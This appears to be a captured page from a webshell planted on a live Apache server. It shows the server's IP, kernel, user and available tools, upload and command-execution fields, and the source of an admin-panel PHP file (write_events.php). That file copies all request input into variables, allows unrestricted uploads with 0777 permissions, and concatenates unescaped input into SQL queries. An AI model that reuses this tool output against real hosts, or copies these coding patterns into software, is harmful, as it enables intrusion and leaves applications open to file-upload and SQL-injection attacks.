403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_events.php
<?php
include_once("session.php");
include_once("settings.php");

/*echo "<pre>";
print_r($_REQUEST);
echo "</pre>";*/

foreach($_REQUEST as $key => $val){
	$$key = $val;
}
$target_path = "../cat_images/events/";
$prefix=time();
$target_path = $target_path.basename($prefix.$_FILES['eventImage']['name']); 


$startDate =  strtotime($startDate) + 37800;
$endDate   = strtotime($endDate)  + 37800;

if($_REQUEST['mode']=="Edit"){
	if($_FILES['eventImage']['name'] != ""){
		if(move_uploaded_file($_FILES['eventImage']['tmp_name'], $target_path)) {
			chmod($target_path,0777); 
			$upload_image = basename($prefix.$_FILES['eventImage']['name']);
			$str = "image = '".$upload_image."', ";
		}		
	}
	 $sql="update `tblNews` set ".$str." `type`='".$txtType."', `title`='".$txtTitle."', `description`='".mysql_real_escape_string($EditDescription)."',  `startDate`='".$startDate."', `endDate`='".$endDate."' ,`updatedOn`= unix_timestamp() , updatedBy='admin' where `id`=".$id."";
}


else{
	if($_FILES['eventImage']['name']!=""){
		if(move_uploaded_file($_FILES['eventImage']['tmp_name'], $target_path)) {
			chmod($target_path,0777); 
			$upload_image = basename($prefix.$_FILES['eventImage']['name']);				
		}		
	}
	$sql="INSERT INTO `tblNews` (`type`, `title`, `description`, `image`, `startDate`, `endDate`, `createdOn`, `createdBy`, `isDeleted`) VALUES ('".$txtType."', '".$txtTitle."', '".mysql_real_escape_string($EditDescription)."', '".$upload_image."', '".$startDate."', '".$endDate."', unix_timestamp(), 'admin', 'no')";
}


$result=mysql_query($sql) or die(mysql_error());

?>
<script>
document.location="events_list.php?page=listevents"
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit